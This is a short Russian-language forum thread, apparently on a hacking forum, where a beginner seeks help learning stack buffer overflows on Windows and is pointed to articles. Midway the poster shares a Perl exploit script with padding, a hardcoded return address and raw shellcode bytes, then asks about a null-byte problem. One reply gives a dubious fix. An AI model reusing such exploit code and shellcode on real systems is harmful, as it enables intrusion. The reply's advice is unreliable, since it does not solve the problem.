|
Переполнения буфера!!!
кинте сылку на видео уроки по Переполнения буфера. :(
|
какие видеоуроки, статей и так выше крыши
|
_wikipedia.org/wiki/Переполнение_буфера
так же на wasm.ru есть статьи... юзайте поиск... _wasm.ru/article.php?article=1020001 |
там только теория
|
Если вы знакомы с теорией,тогда в чём проблема?остаётся только практика,либо вы просто лентяй.
|
в том то й проблема что ето только теория а кат ето использовать,написать сплоит?
поиоему там об етом ничево нету. |
_wasm.ru/article.php?article=buf_over4noob...
|
здесь всьо про Unix системы,а про винду есть?
|
Крис Касперски об этом не одну книгу написал, just use google =)
|
там ничево нету.
|
сенкс понял только никак незапущу шелкод на исполнения.
получается вот такая хрень вбиваю 28 букв затем адрес возврата. в Olly видна как оно переходит на адрес возврата. затем питаюсь вбить експлоит после адреса возврата но он затрагивает адрес возврата.што делать непойму. |
лучше тему в реверсинг.
Цитата:
|
ТС, вот для кого грейт старался, писал статью, все разъяснял, с примерами, а?
Неужели так трудно заюзать поиск по форуму? http://forum.antichat.ru/thread26791.html |
разобрался только неможу вбить правельний адрес возврата.
вбиваю "\x40\xfb\x22\x00" а оно вместо первих нулей пишет 20. што делать подскажите. |
Ладно обясню по подробней.
есть мой exploit на Perl: #!perl $Poc = "\x61" x28; $returnadr = "\x40\xfb\x22\x00"; $shellcode = "\x33\xC0\xB8\x8F". "\x7A\x83\x7C\x68". "\x00\x04\x00\x00". "\x68\x00\x03\x00". "\x00\xFF\xD0\x33". "\xC0\xB8\xFA\xCA". "\x81\x7C\xFF\xD0"; print "$Poc$returnadr$shellcode";. загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40. тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00. |
смини в стрроке \x40\xfb\x22\x00 на \x40\xfb\x22\x20 и все будит ok
зы: сначала прочол тему как у мня "переполнение мочевого пузыря" г г г |
тоже сомое.
|
| Время: 06:17 |